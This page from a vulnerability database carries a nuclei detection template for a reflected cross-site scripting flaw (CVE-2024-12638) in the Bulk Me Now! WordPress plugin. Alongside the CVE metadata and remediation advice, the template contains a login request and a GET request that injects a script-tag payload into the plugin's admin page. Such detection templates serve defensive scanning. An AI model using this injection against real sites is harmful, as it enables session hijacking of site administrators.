Lucene search
K

Bulk Me Now! Plugin <= 2.0 - Cross-Site Scripting

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 12 Views

Bulk Me Now! plugin <=2.0 has reflected XSS from improper input handling and escaping.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-12638
30 Jan 202506:09
circl
CNNVD
WordPress plugin Bulk Me Now! 安全漏洞
30 Jan 202500:00
cnnvd
CVE
CVE-2024-12638
30 Jan 202506:00
cve
Cvelist
CVE-2024-12638 Bulk Me Now <= 2.0 - Reflected XSS
30 Jan 202506:00
cvelist
EUVD
EUVD-2024-51015
3 Oct 202520:07
euvd
NVD
CVE-2024-12638
30 Jan 202506:15
nvd
OSV
CVE-2024-12638
30 Jan 202506:15
osv
Patchstack
WordPress Bulk Me Now plugin <= 2.0 - Reflected XSS vulnerability
30 Jan 202508:10
patchstack
Positive Technologies
PT-2025-1923
30 Jan 202500:00
ptsecurity
RedhatCVE
CVE-2024-12638
23 May 202507:10
redhatcve
Rows per page
id: CVE-2024-12638

info:
  name: Bulk Me Now! Plugin <= 2.0 - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: high
  description: |
    Bulk Me Now! WordPress plugin <= 2.0 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious URL.
  impact: |
    Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the vulnerability is fixed or implement input sanitization and output escaping.
  reference:
    - https://wpscan.com/vulnerability/a6f5b0fe-00a0-4e30-aec6-87882c035beb/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12638
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2024-12638
    cwe-id: CWE-79
    epss-score: 0.00532
    epss-percentile: 0.41099
    cpe: cpe:2.3:a:ombu:bulk_me_now\!:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ombu
    product: bulk_me_now
  tags: cve,cve2024,bulk-me-now,wordpress,wp,wp-plugin,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=bulkmenow-list&status=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "><script>alert(document.domain)</script><script>", "Unread Messages")
          - contains(content_type, "text/html")
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100877120f3631fbb8ea983ecdc4be98de74baccf52fd543dfe4bd54d782c8c0959022100ceb75506c593084623ccff8126c0b375858373a8c29207007a617aa654e7ec0a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2026 03:16Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.1
EPSS0.00532
SSVC
12